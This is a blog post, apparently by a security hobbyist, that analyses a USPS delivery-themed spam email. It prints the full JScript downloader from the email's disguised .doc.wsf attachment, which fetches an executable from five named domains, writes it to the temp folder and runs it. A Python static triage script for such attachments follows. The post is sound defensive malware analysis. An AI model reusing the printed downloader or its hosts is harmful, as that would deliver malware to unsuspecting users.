At the moment I am receiving a lot of spam claiming that there's an issue with a delivery.

I want to share the latest one with you:

Email:

FROM: USPS Priority Parcels willie.ritchie@royalfoods.ru

SUBJECT: USPS issue #02605688: unable to delivery parcel

ATTACHMENT: Undelivered-Package-02605688.zip

CONTENT:

Dear Martin,

This is to confirm that your item has been shipped at December 15.

Please check the attachment for complete details!

Yours faithfully, Willie Ritchie, USPS Chief Station Manager.

Attachment:

I unzipped the attachment and got a file called Undelivered-Package-02605688.doc.wsf. OK, a Windows Script File which looks like a doc on most Windows systems :/ Let's look at what's inside:

<job>
<script language=JScript>
function ge() { 
  var rt = 0; 
  try { 
    xo.open("GET","http://"+ll[i]+"/counter/"+x+n, false); 
    xo.send(); 
    if(xo.status==200) { 
      xa.open(); 
      xa.type=1; 
      xa.write(xo.responseBody); 
      if(xa.size>100000) { 
        var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+n+"153146.exe";     
        xa.saveToFile(fn,2); 
        try { 
          ws.Run(fn,1,0); 
          rt = 1; 
        } catch(er){
        }; 
      }; 
      xa.close(); 
    }; 
  } catch(er){
  }; 
  return rt; 
} 

var i=0; 
var xo = WScript.CreateObject("Msxml2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var ws = WScript.CreateObject("WScript.Shell"); 
var ll = new Array("capsynch.com", 
 "aventurarealestatedirectory.com",
 "www.pratomoscaclub.it",
 "www.apogeoform.net",
 "www.iblasoni.com"); 
var x = "?a=228567&i=Y5rzyqa6RhRlpw19Jl94p4F1b4I22hWFQ0_HjXbKHychcZyn0b_kMs1eEwV0pM5uEJsjRyZ3a1bm7F-R2AJJb7coBJcrLA&r="; 

for(var n=1;n<=2;n++) { 
  while (i<ll.length) { 
    if(ge() == 1) { 
      break; 
    }; 
    i++; 
  }; 
};</script></job>

Nice, seems like we found a little downloader :D. I'll try to download the stuff from the domains above tomorrow to see what's actually happening if somebody clicks this attachment. Hopefully the files are still online then. Stay tuned.
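For anyone who wants to triage attachments like this without running them, here is an added example (my own, not part of the original post or the sample) of a small static checker: it flags the double extension, looks for the COM objects this downloader chains together (XMLHTTP to fetch, ADODB.Stream to write, WScript.Shell to run) and pulls out the hard-coded domains and URL path. The embedded WSF is a constructed fragment modelled on the script above; the domains in it are placeholders, not the real ones.

```python
import re

# Constructed WSF fragment modelled on the downloader above (placeholder domains,
# not meant to be executed; it only serves as input for the triage function).
SAMPLE_WSF = """<job>
<script language=JScript>
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ws = WScript.CreateObject("WScript.Shell");
var ll = new Array("c2-one.invalid", "www.c2-two.invalid");
xo.open("GET","http://"+ll[i]+"/counter/"+x+n, false);
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+n+"153146.exe";
xa.saveToFile(fn,2);
ws.Run(fn,1,0);
</script></job>
"""

# Substring -> what its presence means in a script-based dropper.
INDICATORS = {
    "Msxml2.XMLHTTP": "HTTP client object (fetch stage)",
    "ADODB.Stream": "binary stream object (write stage)",
    "saveToFile": "payload written to disk",
    "WScript.Shell": "shell object (execute stage)",
    ".Run(": "launches dropped file",
    "%TEMP%": "drops into user temp directory",
}
SCRIPT_EXT = {"wsf", "js", "jse", "vbs", "vbe", "hta"}
LURE_EXT = {"doc", "docx", "pdf", "xls", "jpg", "txt"}
BINARY_EXT = {"exe", "dll", "scr", "bat", "cmd"}

def triage_wsf(filename: str, content: str) -> dict:
    """Static triage of a WSF/JScript attachment; nothing is executed."""
    parts = filename.lower().rsplit(".", 2)
    double_ext = len(parts) == 3 and parts[1] in LURE_EXT and parts[2] in SCRIPT_EXT
    # WSF is not strict XML (unquoted attributes), so pull script bodies with a regex.
    body = "\n".join(re.findall(r"<script[^>]*>(.*?)</script>", content, re.S | re.I))
    hits = [desc for key, desc in INDICATORS.items() if key in body]
    # Quoted lowercase host names; drop strings that are really dropped-file names.
    domains = [d for d in re.findall(r'"((?:[a-z0-9-]+\.)+[a-z]{2,})"', body)
               if d.rsplit(".", 1)[1] not in BINARY_EXT]
    url_paths = re.findall(r'"(/[^"]*)"', body)
    score = len(hits) + (2 if double_ext else 0)
    verdict = "downloader" if score >= 5 else "suspicious" if score >= 2 else "clean"
    return {"double_extension": double_ext, "indicators": hits,
            "domains": domains, "url_paths": url_paths, "verdict": verdict}

if __name__ == "__main__":
    print(triage_wsf("Undelivered-Package-02605688.doc.wsf", SAMPLE_WSF))
```

The extracted domains and path are what you would feed into proxy or DNS logs to find users who already opened the attachment.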

UPDATE: As promised, here are the results. Unfortunately I was too slow and the downloads are no longer available.